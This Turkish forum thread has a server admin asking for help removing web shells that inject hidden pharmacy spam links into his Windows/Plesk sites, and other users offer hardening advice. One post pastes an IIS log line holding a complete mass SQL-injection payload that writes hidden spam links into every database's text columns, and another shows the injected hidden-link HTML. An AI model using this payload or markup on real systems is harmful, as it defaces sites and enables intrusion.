Windows Sunucuya Shell Atılıyor

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek

    Merhaba,

    Kendime ait windows sunucuma shell atıyorlar

    bazı dosyaların içine viagra linkleri vs veriliyor. Bir web sitesinden diğerlerinin tamamına atabiliyorlar. kaynağını nasıl tespit edebilirim? 

     

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Vac
    Vac's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Temmuz/2015
    Erkek

    uzaktan masaüstü şifreni değiştir 

    uzaktan masaüstü portunu değiştir

    Scriptlerini ne kullanıyorsun ?

    Ftp Şifreni ve panel şifrelerini değiş 


    Comeback...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sancaks
    sancaks's avatar
    Kayıt Tarihi: 27/Kasım/2010
    Erkek

    arkadaşın dediklerini yap.. gizli bir yere shell atmış sen temizledikçe geri gelip tekrar bulaşabilir bunu kesinleştir onu bulmaya çalış

     

     

    sancaks tarafından 08/Tem/16 19:42 tarihinde düzenlenmiştir
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pesimistzombie
    pesimistzombie's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    pleske gir pleskten sitelerin dosyaları incele tanımadığın dosyaları inceleyerek sil. Bazı sheller gözükmeyebiliyor gizli dosyaları görmeyi açsanbile. Ne kadar silersen sil gizli dosyayı silmediğin sürece otomatik çekiyor ve yayılıyor sürekli. Gizli dosyaları pleskin file managerıyla veya winrar programıyla dizinlerde gezerek görebilirsin. Bir de hack yiyen sitenin lgolarını incele.


    :|
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SPY-CX5
    SPY-CX5's avatar
    Savaş Madalyası Üstün Hizmet Madalyası Savaş Madalyası
    Kayıt Tarihi: 03/Mart/2007
    Erkek

    hocam kurulu yazılımları yazaydın iyidi.

    window sürümün nedir

    kontrol paneli ne kullanıyorsun vsvs

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DesertSun
    DesertSun's avatar
    Kayıt Tarihi: 10/Eylül/2002
    Erkek

    Windows rdp lerde non public zeroday var eger onla giriyolarsa sifreyi degistirsende isin zor portu degistirsende nmap le bulurlar ip restriction koy rdp ve ftp lerine


    ::: REALHACKERS.NET ADMIN :::
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek
    DesertSun bunu yazdı

    Windows rdp lerde non public zeroday var eger onla giriyolarsa sifreyi degistirsende isin zor portu degistirsende nmap le bulurlar ip restriction koy rdp ve ftp lerine

    Reis dediğini anlamadım valla

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek
    sancaks bunu yazdı

    arkadaşın dediklerini yap.. gizli bir yere shell atmış sen temizledikçe geri gelip tekrar bulaşabilir bunu kesinleştir onu bulmaya çalış

     

     

    şifreler vs değiştim daha önceden tekrar etti. işte o shell dosyasını nasıl bulabilirim bi püf varmı.

    text tarayan bir program ile tüm asp php vs içini tarayabilirim acaba shell veya zehir dosyalarının içinde kesin geçen anahtar kelime ne olabilir onu bilsem bulabilirim diye düşünüyorum.

  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek
    SPY-CX5 bunu yazdı

    hocam kurulu yazılımları yazaydın iyidi.

    window sürümün nedir

    kontrol paneli ne kullanıyorsun vsvs

    windows server 2012 r2

    plesk 12,5

    kullanıyorum

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek
    pesimistzombie bunu yazdı

    pleske gir pleskten sitelerin dosyaları incele tanımadığın dosyaları inceleyerek sil. Bazı sheller gözükmeyebiliyor gizli dosyaları görmeyi açsanbile. Ne kadar silersen sil gizli dosyayı silmediğin sürece otomatik çekiyor ve yayılıyor sürekli. Gizli dosyaları pleskin file managerıyla veya winrar programıyla dizinlerde gezerek görebilirsin. Bir de hack yiyen sitenin lgolarını incele.

    bi sayfanın logunda şu şekilde birşey var. 

     

    2016-05-23 22:30:07 W3SVC166 SSDserver 92.42.39.117 GET /x.asp d=8';declare%20@b%20cursor;declare%20@s%20varchar(8000);declare%20@w%20varchar(99);set%20@b=cursor%20for%20select%20DB_NAME()%20union%20select%20name%20from%20sys.databases%20where%20(has_dbaccess(name)!=0)%20and%20name%20not%20in%20('master','tempdb','model','msdb',DB_NAME());open%20@b;fetch%20next%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0%20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20''update%20%5B''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAME%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''viagra%20manufacturer%20coupon%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''buyerauctionmanager.com''%2Bchar(47)%2B''blog''%2Bchar(47)%2B''blog''%2Bchar(47)%2B''page''%2Bchar(47)%2B''Viagra-Discount-Coupon.aspx%22''%2Bchar(62)%2B''''''%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''''buyerauctionmanager.com''''%20when%201%20then%20''''drug%20coupon''''%20else%20''''buyerauctionmanager.com''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20prescriptions%20coupons''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else%20''''''''%20end''%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))%20and%20DATA_TYPE%20like%20''%25varchar''%20and(CHARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c%20end%20try%20begin%20catch%20end%20catch';exec%20(@s);fetch%20next%20from%20@b%20into%20@w;end;close%20@b--|29|80040e14|[Microsoft][ODBC_Microsoft_Access_Driver]_Syntax_error_(missing_operator)_in_query_expression_'id=8';declare_@b_cursor;declare_@s_varchar(8000);declare_@w_varchar(99);set_@b=cursor_for_select_DB_NAME()_union_select_name_from_sys.databases_where_(has_dbaccess(name)!=0)_and_name_not_in_('master'_'tempdb'_'model'_'msdb'_DB_NAME());open_@b;fetch_next_from'. 80 - 98.165.161.64 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@b+cursor;declare+@s+varchar(8000);declare+@w+varchar(99);set+@b=cursor+for+select+DB_NAME()+union+select+name+from+sys.databases+where+(has_dbaccess(name)!=0)+and+name+not+in+('master','tempdb','model','msdb',DB_NAME());open+@b;fetch+next+from+@b+into+@w;while+@@FETCH_STATUS=0+begin+set+@s='begin+try+use+'+@w+';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+''update+[''+TABLE_NAME+'']+set+[''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case+ABS(CHECKSUM(NewId()))%10+when+0+then+''''<div+style="display:none">viagra+manufacturer+coupon+<a+href="http://buyerauctionmanager.com/blog/blog/page/Viagra-Discount-Coupon.aspx">''''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''''buyerauctionmanager.com''''+when+1+then+''''drug+coupon''''+else+''''buyerauctionmanager.com''''+end++''''</a>+prescriptions+coupons</div>''''+else+''''''''+end''+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid+in+(0,1))+and+DATA_TYPE+like+''%varchar''+and(CHARACTER_MAXIMUM_LENGTH+in+(2147483647,-1));open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c+end+try+begin+catch+end+catch';exec+(@s);fetch+next+from+@b+into+@w;end;close+@b-- - http://google.com';declare+@b+cursor;declare+@s+varchar(8000);declare+@w+varchar(99);set+@b=cursor+for+select+DB_NAME()+union+select+name+from+sys.databases+where+(has_dbaccess(name)!=0)+and+name+not+in+('master','tempdb','model','msdb',DB_NAME());open+@b;fetch+next+from+@b+into+@w;while+@@FETCH_STATUS=0+begin+set+@s='begin+try+use+'+@w+';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+''update+[''+TABLE_NAME+'']+set+[''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case+ABS(CHECKSUM(NewId()))%10+when+0+then+''''<div+style="display:none">viagra+manufacturer+coupon+<a+href="http://buyerauctionmanager.com/blog/blog/page/Viagra-Discount-Coupon.aspx">''''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''''buyerauctionmanager.com''''+when+1+then+''''drug+coupon''''+else+''''buyerauctionmanager.com''''+end++''''</a>+prescriptions+coupons</div>''''+else+''''''''+end''+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid+in+(0,1))+and+DATA_TYPE+like+''%varchar''+and(CHARACTER_MAXIMUM_LENGTH+in+(2147483647,-1));open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c+end+try+begin+catch+end+catch';exec+(@s);fetch+next+from+@b+into+@w;end;close+@b-- www.benimdomainim.com 500 0 0 4958 4704 515

     

    bu logun geçtiği sitede başarılı olamamış. herhangi bir link falan atamamış. 

    link atmayı başardığı sitelerde bu tür loglar yok. 

    sql lerde hiçbir sorun göremedim bu kod sanırım sql injection atmak için yazılmış ama nokta virgül tırnak gibi karakterleri süzdüğüm için yememiş diye düşünüyorum..

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kanoonline
    kanoonline's avatar
    Kayıt Tarihi: 30/Mart/2007
    Erkek

    masterpage ime atılan kod hep bu şekilde

    <p style="position: absolute;height: 1px;width: 1px;overflow: hidden;clip: rect(1px 1px 1px 1px);">

    <a href='http://www.stand-parapluie.eu/' title='kamagra gel'>kamagra gel</a>

    <a href='http://www.careforvet.eu/' title='kamagra 100'>kamagra 100</a>

    <a href='http://www.milestrellas.es/' title='cialis generico'>cialis generico</a>

    <a href='http://www.precioviagra.es/' title='precio viagra'>precio viagra</a>

    <a href='http://www.kamagragel.es/' title='kamagra gel'>kamagra gel</a>

    <a href='http://www.sailbeluga.nl/' title='levitra generico'>levitra generico</a>

    <a href='http://www.aldusa.es/' title='cialis sin receta'>cialis sin receta</a>

    <a href='http://www.krkonose-levne-ubytovani.eu/' title='viagra generico'>viagra generico</a>

    <a href='http://www.viagrapfizer.es/' title='viagra pfizer'>viagra pfizer</a>

    <a href='http://www.comprarlovegra.com/' title='comprar lovegra'>comprar lovegra</a>

    <a href='http://www.viagraocialis.com/' title='viagra o cialis'>viagra o cialis</a>

    <a href='http://www.precioviagra.es/' title='viagra precio'>viagra precio</a>

    <a href='http://www.hormigonimpresoespana.eu/' title='cialis precio'>cialis precio</a>

    <a href='http://www.krisz12.eu/' title='kamagra gel'>kamagra gel</a>

    <a href='http://www.alternativeradio.co.uk/' title='cheap levitra uk'>cheap levitra uk</a>

    <a href='http://www.kamagra100mg.co.uk/' title='kamagra 100mg'>kamagra 100mg</a>

    <a href='http://www.levitrauk.co.uk/' title='levitra uk'>levitra uk</a>

    <a href='http://www.cialisgeneric.co.uk/' title='cialis generic'>cialis generic</a>

    <a href='http://www.kamagragel.co.uk/' title='kamagra gel'>kamagra gel</a>

    <a href='http://www.laptop-screen-repair.co.uk/' title='cheap cialis uk'>cheap cialis uk</a>

    <a href='http://www.acuponcture.ch/' title='cialis svizzera'>cialis svizzera</a>

    <a href='http://www.lesbanlieues.ch/' title='viagra svizzera'>viagra svizzera</a>

    </p>

    forum için umarım bu linkler umarım sorun olmaz.
    sorun olursa admin abiler kulağımı çekmeden müdahale ederselerse sevinirim. 

     

Toplam Hit: 1489 Toplam Mesaj: 13
shell windows server